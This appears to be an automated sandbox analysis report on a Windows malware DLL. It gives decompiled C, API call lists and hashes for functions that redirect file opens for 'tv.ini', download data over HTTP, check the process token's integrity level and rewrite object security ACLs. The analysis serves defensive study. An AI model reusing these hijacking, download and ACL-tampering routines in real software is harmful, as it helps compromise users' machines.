                                                                                                                        0x6f33bbe1
                                                                                                                        0x6f33bcd1
                                                                                                                        0x6f33bcc9
                                                                                                                        0x6f33bccf
                                                                                                                        0x6f33bccf
                                                                                                                        0x6f33bcda
                                                                                                                        0x6f33bce2
                                                                                                                        0x6f33bcee
                                                                                                                        0x6f33bcf4
                                                                                                                        0x6f33bcf6
                                                                                                                        0x6f33bd28
                                                                                                                        0x6f33bd2b
                                                                                                                        0x6f33bd35
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd35
                                                                                                                        0x6f33bcf8
                                                                                                                        0x6f33bcfe
                                                                                                                        0x6f33bd0e
                                                                                                                        0x6f33bd0e
                                                                                                                        0x6f33bd10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd03
                                                                                                                        0x6f33bd05
                                                                                                                        0x6f33bd07
                                                                                                                        0x6f33bd09
                                                                                                                        0x6f33bd09
                                                                                                                        0x6f33bd0b
                                                                                                                        0x6f33bd0b
                                                                                                                        0x6f33bd0b
                                                                                                                        0x6f33bd13
                                                                                                                        0x6f33bd19
                                                                                                                        0x6f33bd20
                                                                                                                        0x6f33bd20
                                                                                                                        0x00000000
                                                                                                                        0x6f33bd27
                                                                                                                        0x6f33bce4
                                                                                                                        0x6f33bce6
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • InterlockedCompareExchange.KERNEL32(6F340964,?,00000000), ref: 6F33BC2B
                                                                                                                        • _amsg_exit.MSVCRT ref: 6F33BC48
                                                                                                                        • InterlockedExchange.KERNEL32(6F340964,00000000), ref: 6F33BC92
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F33BCC9
                                                                                                                        • InterlockedCompareExchange.KERNEL32(6F340964,00000001,00000000), ref: 6F33BCD4
                                                                                                                        • _amsg_exit.MSVCRT ref: 6F33BCE6
                                                                                                                        • free.MSVCRT(00C06600), ref: 6F33BD13
                                                                                                                        • InterlockedExchange.KERNEL32(6F340964,00000000), ref: 6F33BD35
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$Compare_amsg_exit$Sleepfree
                                                                                                                        • String ID: d4o$d4o
                                                                                                                        • API String ID: 1670123637-3031744194
                                                                                                                        • Opcode ID: 0a3efa0dfdfdf4a21f909cbdd09916f0f29e6f10b98879d45571159f0939605d
                                                                                                                        • Instruction ID: 7b5427e9f727e28c60f6dd4a89875de89a6ae219444777c7c72b2acd756cb66a
                                                                                                                        • Opcode Fuzzy Hash: 0a3efa0dfdfdf4a21f909cbdd09916f0f29e6f10b98879d45571159f0939605d
                                                                                                                        • Instruction Fuzzy Hash: 9E41E6B3A45AE5EBEB20EF648D80B5A33ADAB52375F00452EF904DD1A1CF35A4518B31
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F337C40, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 114filestringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			E6F337C40(signed int __eax, WCHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28, intOrPtr _a32, intOrPtr _a36) {
				char _v516;
				short _v524;
				short _v532;
				signed int _t19;
				void* _t22;
				WCHAR* _t24;
				WCHAR* _t27;
				struct _SECURITY_ATTRIBUTES* _t35;
				short _t40;
				intOrPtr _t41;
				WCHAR* _t45;
				WCHAR* _t48;
				short _t50;
				WCHAR* _t53;
				WCHAR* _t55;

				_t19 = __eax;
				_t55 = _a4;
				if(_t55 == 0) {
					L10:
					_t22 = CreateFileW(_t55, _a8, _a12, _a16, _a20, _a24, _a28); // executed
					return _t22;
				} else {
					if( *_t55 != 0x3a) {
						_t53 = PathFindFileNameW(_t55);
						_t24 = M6F340528; // 0xa53e68
						if(lstrcmpiW(_t55, _t24) == 0) {
							_pop(_t53);
							_pop(_t55);
							_t45 = M6F340534; // 0xa563b0
							_a4 = _t45;
							goto M6F3405A4;
						}
						_t48 = M6F34056C; // 0x77af54
						_t19 = lstrcmpiW(_t53, _t48);
						if(_t19 == 0) {
							goto L2;
						} else {
							_t27 = M6F340554; // 0x749734
							_t19 = StrCmpNIW(_t55, _t27, 0xb);
							if(_t19 == 0) {
								goto L2;
							} else {
								if(lstrcmpiW(_t53, L"tv.ini") != 0) {
									goto L10;
								} else {
									_t40 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
									wsprintfW( &_v532, L"%s%s", _t40, _t53);
									if(lstrcmpiW( &_v524, _t55) != 0) {
										goto L10;
									} else {
										_t41 = M6F340550; // 0x749736
										_t50 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
										wsprintfW( &_v524, L"%s%s%s", _t50, _t41, L".ini");
										_push(_a36);
										_push(_a32);
										_push(_a28);
										_t35 = _a16;
										_push(_a24);
										_push(_a20);
										_push(_t35);
										_push( &_v516);
										M6F3405A4();
										return _t35;
									}
								}
							}
						}
					} else {
						L2:
						return _t19 | 0xffffffff;
					}
				}
			}


















                                                                                                                        0x6f337c40
                                                                                                                        0x6f337c48
                                                                                                                        0x6f337c52
                                                                                                                        0x6f337d65
                                                                                                                        0x6f337d96
                                                                                                                        0x6f337da5
                                                                                                                        0x6f337c58
                                                                                                                        0x6f337c5c
                                                                                                                        0x6f337c7a
                                                                                                                        0x6f337c7c
                                                                                                                        0x6f337c87
                                                                                                                        0x6f337c89
                                                                                                                        0x6f337c8a
                                                                                                                        0x6f337c92
                                                                                                                        0x6f337c98
                                                                                                                        0x6f337c9c
                                                                                                                        0x6f337c9c
                                                                                                                        0x6f337ca2
                                                                                                                        0x6f337caa
                                                                                                                        0x6f337cae
                                                                                                                        0x00000000
                                                                                                                        0x6f337cb0
                                                                                                                        0x6f337cb0
                                                                                                                        0x6f337cb9
                                                                                                                        0x6f337cc1
                                                                                                                        0x00000000
                                                                                                                        0x6f337cc3
                                                                                                                        0x6f337ccd
                                                                                                                        0x00000000
                                                                                                                        0x6f337cd3
                                                                                                                        0x6f337cd3
                                                                                                                        0x6f337ceb
                                                                                                                        0x6f337cfa
                                                                                                                        0x00000000
                                                                                                                        0x6f337cfc
                                                                                                                        0x6f337cfc
                                                                                                                        0x6f337d02
                                                                                                                        0x6f337d19
                                                                                                                        0x6f337d33
                                                                                                                        0x6f337d3b
                                                                                                                        0x6f337d43
                                                                                                                        0x6f337d44
                                                                                                                        0x6f337d4b
                                                                                                                        0x6f337d4c
                                                                                                                        0x6f337d4d
                                                                                                                        0x6f337d52
                                                                                                                        0x6f337d53
                                                                                                                        0x6f337d62
                                                                                                                        0x6f337d62
                                                                                                                        0x6f337cfa
                                                                                                                        0x6f337ccd
                                                                                                                        0x6f337cc1
                                                                                                                        0x6f337c60
                                                                                                                        0x6f337c60
                                                                                                                        0x6f337c6a
                                                                                                                        0x6f337c6a
                                                                                                                        0x6f337c5c

                                                                                                                        APIs
                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 6F337C6E
                                                                                                                        • lstrcmpiW.KERNEL32(?,00A53E68), ref: 6F337C83
                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 6F337D96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateFindNamePathlstrcmpi
                                                                                                                        • String ID: %s%s$%s%s%s$.ini$tv.ini
                                                                                                                        • API String ID: 3438131021-2591480844
                                                                                                                        • Opcode ID: 2ca70390e2e595a24703f28b25710cd9f95ababb93957c3bfe1f40c835b80e34
                                                                                                                        • Instruction ID: 2ed0c9728fc17fd149b52cc483663096b9a1a927e199fac55dd38c4ecf834b56
                                                                                                                        • Opcode Fuzzy Hash: 2ca70390e2e595a24703f28b25710cd9f95ababb93957c3bfe1f40c835b80e34
                                                                                                                        • Instruction Fuzzy Hash: D331A2B3608651AFD320EBA8DC84EAB73ADEFC9730F10451DF95583240DB35E8158B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335540, Relevance: 21.1, APIs: 14, Instructions: 117memorynetworkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335540(void* _a4, intOrPtr* _a8) {
				long _v4;
				void _v8;
				long* _v12;
				void* _v16;
				intOrPtr _v28;
				long _v32;
				void* _v44;
				int _v48;
				long _v60;
				void* _t25;
				int _t34;
				int _t35;
				long _t40;
				void* _t44;
				long _t53;
				DWORD* _t54;

				_t54 = 0;
				_t53 = 0;
				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x2000); // executed
				_t44 = _t25;
				if(_t44 == 0) {
					 *_a8 = 0;
					return 0;
				} else {
					_v8 = 0;
					_v4 = 4;
					if(HttpQueryInfoA(_a4, 0x20000013,  &_v8,  &_v4, 0) != 0 && _v28 == 0xc8) {
						_v32 = 0;
						_t34 = InternetReadFile(_v16, _t44, 0x1fff,  &_v32); // executed
						if(_t34 != 0) {
							while(1) {
								_t35 = _v48;
								if(_t35 == 0) {
									goto L15;
								}
								if(_t54 > 0x100000) {
									if(_t53 != 0) {
										goto L13;
									}
									goto L14;
								} else {
									if(_t53 != 0) {
										_t40 = HeapReAlloc(GetProcessHeap(), 0, _t53, _t35 + _t54 + 1);
										if(_t40 == 0) {
											L13:
											HeapFree(GetProcessHeap(), 0, _t53);
											L14:
											_t53 = 0;
											_t54 = 0;
										} else {
											goto L10;
										}
									} else {
										_t12 = _t54 + 1; // 0x20000014
										_t40 = HeapAlloc(GetProcessHeap(), _t53, _t35 + _t12);
										L10:
										_t53 = _t40;
										RtlMoveMemory(_t53 + _t54, _t44, _v48);
										_t54 = _t54 + _v60;
										 *(_t53 + _t54) = 0;
										_v60 = 0;
										if(InternetReadFile(_v44, _t44, 0x1fff,  &_v60) != 0) {
											continue;
										} else {
										}
									}
								}
								goto L15;
							}
						}
					}
					L15:
					HeapFree(GetProcessHeap(), 0, _t44);
					 *_v12 = _t53;
					return _t54;
				}
			}



















                                                                                                                        0x6f335554
                                                                                                                        0x6f335556
                                                                                                                        0x6f33555b
                                                                                                                        0x6f335561
                                                                                                                        0x6f335565
                                                                                                                        0x6f33567f
                                                                                                                        0x6f33568a
                                                                                                                        0x6f33556b
                                                                                                                        0x6f335580
                                                                                                                        0x6f335584
                                                                                                                        0x6f335594
                                                                                                                        0x6f3355b8
                                                                                                                        0x6f3355bc
                                                                                                                        0x6f3355c4
                                                                                                                        0x6f3355d0
                                                                                                                        0x6f3355d0
                                                                                                                        0x6f3355d6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3355e2
                                                                                                                        0x6f33564d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3355e4
                                                                                                                        0x6f3355e6
                                                                                                                        0x6f335604
                                                                                                                        0x6f33560c
                                                                                                                        0x6f33564f
                                                                                                                        0x6f335655
                                                                                                                        0x6f33565b
                                                                                                                        0x6f33565b
                                                                                                                        0x6f33565d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3355e8
                                                                                                                        0x6f3355e8
                                                                                                                        0x6f3355f1
                                                                                                                        0x6f33560e
                                                                                                                        0x6f335613
                                                                                                                        0x6f33561a
                                                                                                                        0x6f33561f
                                                                                                                        0x6f335632
                                                                                                                        0x6f335637
                                                                                                                        0x6f335647
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f335649
                                                                                                                        0x6f335647
                                                                                                                        0x6f3355e6
                                                                                                                        0x00000000
                                                                                                                        0x6f3355e2
                                                                                                                        0x6f3355d0
                                                                                                                        0x6f3355c4
                                                                                                                        0x6f33565f
                                                                                                                        0x6f335665
                                                                                                                        0x6f33566f
                                                                                                                        0x6f33567a
                                                                                                                        0x6f33567a

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000000), ref: 6F335558
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33555B
                                                                                                                        • HttpQueryInfoA.WININET ref: 6F33558C
                                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6F3355BC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,20000014), ref: 6F3355EE
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3355F1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 6F335601
                                                                                                                        • HeapReAlloc.KERNEL32(00000000), ref: 6F335604
                                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,20000013), ref: 6F33561A
                                                                                                                        • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6F33563F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F335652
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335655
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F335662
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335665
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Alloc$FileFreeInternetRead$HttpInfoMemoryMoveQuery
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1362589046-0
                                                                                                                        • Opcode ID: cc3f2d6d5998976383643e1cb91f6efb3d010b5224ff75cb4ca6b6eedd9969db
                                                                                                                        • Instruction ID: 3b712053e6030056f4d301237fd8775ea5e0c5217c75fde754730b638ba1ce80
                                                                                                                        • Opcode Fuzzy Hash: cc3f2d6d5998976383643e1cb91f6efb3d010b5224ff75cb4ca6b6eedd9969db
                                                                                                                        • Instruction Fuzzy Hash: 373189B26043A6ABE710CE699844F6BB7AEFB89754F00091DF949C2140DB31E9088B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B4BE2, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 112libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,LdrUnloadDll,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4C00
                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 004B4C7C
                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4C9E
                                                                                                                        • LoadLibraryA.KERNEL32(security.dll,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4CB1
                                                                                                                        • InterlockedExchange.KERNEL32(00000001,00000000), ref: 004B4CB7
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4CC2
                                                                                                                        • InterlockedExchange.KERNEL32(00805004,00000000), ref: 004B4CEF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,0055A8E2,kernel32.dll,WriteConsoleW,00827088,004B508D), ref: 004B4CFA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$ExchangeInterlocked$FreeLoad$HandleModule
                                                                                                                        • String ID: LdrUnloadDll$ntdll.dll$security.dll$ft
                                                                                                                        • API String ID: 3965272021-579589440
                                                                                                                        • Opcode ID: dc4634acba12b4e2aa2b22c9cfba4cba992891e70106b89f443a36c3aa50dda0
                                                                                                                        • Instruction ID: 33dceadfb9b2b82d47577c4016ca292e05a1d2d94e79d44919137fa0ec80249f
                                                                                                                        • Opcode Fuzzy Hash: dc4634acba12b4e2aa2b22c9cfba4cba992891e70106b89f443a36c3aa50dda0
                                                                                                                        • Instruction Fuzzy Hash: F331EF31201606ABDB219F25AC44AEB3FB9BFC1B51B128022F94197362D73DCC15DBB9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333390, Relevance: 19.6, APIs: 13, Instructions: 108memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E6F333390() {
				intOrPtr _v4;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				void* _v20;
				void* _v24;
				long _v28;
				int _t25;
				int _t33;
				void* _t56;

				_v12 = 0;
				_v20 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v20) == 0) {
					return 0;
				} else {
					_v24 = 0;
					_t25 = GetTokenInformation(_v20, 1, 0, 0,  &_v24); // executed
					if(_t25 == 0 && GetLastError() == 0x7a) {
						_t56 = HeapAlloc(GetProcessHeap(), 8, _v28);
						if(_t56 != 0) {
							_t33 = GetTokenInformation(_v24, 1, _t56, _v28,  &_v28); // executed
							if(_t33 != 0) {
								_v16.Value = 0;
								_v12 = 0x500;
								_v24 = 0;
								if(AllocateAndInitializeSid( &_v16, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
									if(EqualSid( *_t56, _v24) == 0) {
										_push(_v4);
										_push( *_t56);
										L6F33C384();
									} else {
										_v20 = 1;
									}
								}
								FreeSid(_v24);
							}
							HeapFree(GetProcessHeap(), 0, _t56);
						}
					}
					CloseHandle(_v24);
					return _v16.Value;
				}
			}












                                                                                                                        0x6f3333a2
                                                                                                                        0x6f3333a6
                                                                                                                        0x6f3333b2
                                                                                                                        0x6f3334ae
                                                                                                                        0x6f3333b8
                                                                                                                        0x6f3333cd
                                                                                                                        0x6f3333d1
                                                                                                                        0x6f3333d5
                                                                                                                        0x6f333401
                                                                                                                        0x6f333405
                                                                                                                        0x6f33341d
                                                                                                                        0x6f333421
                                                                                                                        0x6f333438
                                                                                                                        0x6f33343c
                                                                                                                        0x6f333443
                                                                                                                        0x6f33344f
                                                                                                                        0x6f333461
                                                                                                                        0x6f333473
                                                                                                                        0x6f333474
                                                                                                                        0x6f333475
                                                                                                                        0x6f333463
                                                                                                                        0x6f333463
                                                                                                                        0x6f333463
                                                                                                                        0x6f333461
                                                                                                                        0x6f33347f
                                                                                                                        0x6f33347f
                                                                                                                        0x6f33348a
                                                                                                                        0x6f33348a
                                                                                                                        0x6f333490
                                                                                                                        0x6f333496
                                                                                                                        0x6f3334a6
                                                                                                                        0x6f3334a6

                                                                                                                        APIs
                                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 6F3333AA
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 6F3333D1
                                                                                                                        • GetLastError.KERNEL32 ref: 6F3333DB
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 6F3333F8
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3333FB
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 6F33341D
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32 ref: 6F333447
                                                                                                                        • EqualSid.ADVAPI32(?,00000000), ref: 6F333459
                                                                                                                        • ConvertSidToStringSidA.ADVAPI32(00000000,00000000), ref: 6F333475
                                                                                                                        • FreeSid.ADVAPI32(00000000), ref: 6F33347F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F333487
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33348A
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F333496
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ProcessToken$FreeInformation$AllocAllocateCloseConvertEqualErrorHandleInitializeLastOpenString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1769087308-0
                                                                                                                        • Opcode ID: 5b8bdc5e8a330e01ec5a2b47b22d0a02201b797101ef7e495cb87761c301a89e
                                                                                                                        • Instruction ID: ee59c0d063054639add101dd8ae4767c52a57c19788051e63e56da3003cdff7a
                                                                                                                        • Opcode Fuzzy Hash: 5b8bdc5e8a330e01ec5a2b47b22d0a02201b797101ef7e495cb87761c301a89e
                                                                                                                        • Instruction Fuzzy Hash: 7F314DB2608355AFD710DF65CC89D5BBBADEF85760F00891DF994C2140D775E8058BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332000, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 124memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 22%
                                                                                                                        			E6F332000(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v40;
				char _v48;
				void* _v52;
				long _v56;
				long _v60;
				long _v64;
				long _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v108;
				intOrPtr _t28;
				intOrPtr _t29;
				long* _t34;
				signed int _t38;
				void* _t50;
				long _t52;
				intOrPtr _t55;

				_t28 =  *_a8;
				_t52 = 0;
				_v48 = 0;
				if(_t28 == 0) {
					_t29 = _a4;
					if(_t29 == 0) {
						goto L2;
					} else {
						_t55 = _a12;
						__imp__GetNamedSecurityInfoA(_t29, _t55, 4, 0, 0,  &_v48, 0,  &_v40); // executed
						if(_t29 != 0) {
							goto L2;
						} else {
							goto L5;
						}
					}
				} else {
					_t55 = _a12;
					__imp__GetSecurityInfo(_t28, _t55, 4, 0, 0,  &_v48, 0,  &_v40); // executed
					if(_t28 == 0) {
						L5:
						_v68 = 0x44;
						_t50 = HeapAlloc(GetProcessHeap(), 8, 0x44);
						if(_t50 != 0) {
							_t34 =  &_v68;
							__imp__CreateWellKnownSid(1, 0, _t50, _t34);
							if(_t34 != 0) {
								_v76 = 1;
								_v80 = 0x10000000;
								_v72 = 3;
								_v64 = 0;
								_v68 = 0;
								_v52 = _t50;
								_v60 = 0;
								_v56 = 0;
								__imp__SetEntriesInAclA(1,  &_v80, _v96,  &_v92);
								_t38 =  *_v56;
								if(_t38 == 0) {
									_t38 = _v60;
									if(_t38 != 0) {
										__imp__SetNamedSecurityInfoA(_t38, _t55, 4, 0, 0, _v108, 0); // executed
										goto L11;
									}
								} else {
									__imp__SetSecurityInfo(_t38, _t55, 4, 0, 0, _v108, 0); // executed
									L11:
									asm("sbb esi, esi");
									_t52 =  ~_t38 + 1;
								}
							}
							HeapFree(GetProcessHeap(), 0, _t50);
						}
						return _t52;
					} else {
						L2:
						return 0;
					}
				}
			}























                                                                                                                        0x6f332007
                                                                                                                        0x6f33200e
                                                                                                                        0x6f332010
                                                                                                                        0x6f332016
                                                                                                                        0x6f332040
                                                                                                                        0x6f332046
                                                                                                                        0x00000000
                                                                                                                        0x6f332048
                                                                                                                        0x6f332048
                                                                                                                        0x6f33205d
                                                                                                                        0x6f332065
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f332065
                                                                                                                        0x6f332018
                                                                                                                        0x6f332018
                                                                                                                        0x6f33202d
                                                                                                                        0x6f332035
                                                                                                                        0x6f332067
                                                                                                                        0x6f33206c
                                                                                                                        0x6f332081
                                                                                                                        0x6f332085
                                                                                                                        0x6f33208b
                                                                                                                        0x6f332094
                                                                                                                        0x6f33209c
                                                                                                                        0x6f3320b3
                                                                                                                        0x6f3320bb
                                                                                                                        0x6f3320c3
                                                                                                                        0x6f3320cb
                                                                                                                        0x6f3320cf
                                                                                                                        0x6f3320d3
                                                                                                                        0x6f3320d7
                                                                                                                        0x6f3320db
                                                                                                                        0x6f3320df
